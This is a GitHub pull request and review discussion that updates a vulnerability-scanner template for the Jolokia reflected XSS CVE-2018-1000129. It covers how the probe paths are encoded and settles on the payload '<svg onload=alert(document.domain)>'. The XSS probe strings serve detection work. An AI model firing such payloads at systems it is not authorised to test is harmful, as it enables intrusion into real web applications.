### PR TITLE
Update CVE-2018-1000129.yaml

### PR DESCRIPTION
**Pull request by flag007**
There are two problems with this payload, / means the path, add it cannot be detected correctly, in addition, it should not be url-encoded

### CODE REVIEW

File: cves/CVE-2018-1000129.yaml [hunk 1]
```diff
@@ -8,15 +8,15 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svgxxxxxx>?mimeType=text/html"
```
Comment (bauthard) [inline cves/CVE-2018-1000129.yaml:11]: Hey, do you think we can replace this with XSS payload `<svg/onload=alert(document.domain)>` and look for a match for the same?

**Review by bauthard — CHANGES_REQUESTED** [review]

**Comment by bauthard** [comment]
thanks for the update @flag007

File: cves/CVE-2018-1000129.yaml (hunk 1 above)
Comment (flag007) [reply cves/CVE-2018-1000129.yaml]: No, / indicates the path and will interrupt the load

Comment (bauthard) [reply cves/CVE-2018-1000129.yaml]: @flag007 `<svg onload=alert(document.domain)>` this looks good? if yes I will update the payload.

Comment (flag007) [reply cves/CVE-2018-1000129.yaml]: You can use <svg onload=alert(document.domain)>

Comment (flag007) [reply cves/CVE-2018-1000129.yaml]: ok

Comment (flag007) [reply cves/CVE-2018-1000129.yaml]: this is ok

**Pull request merged**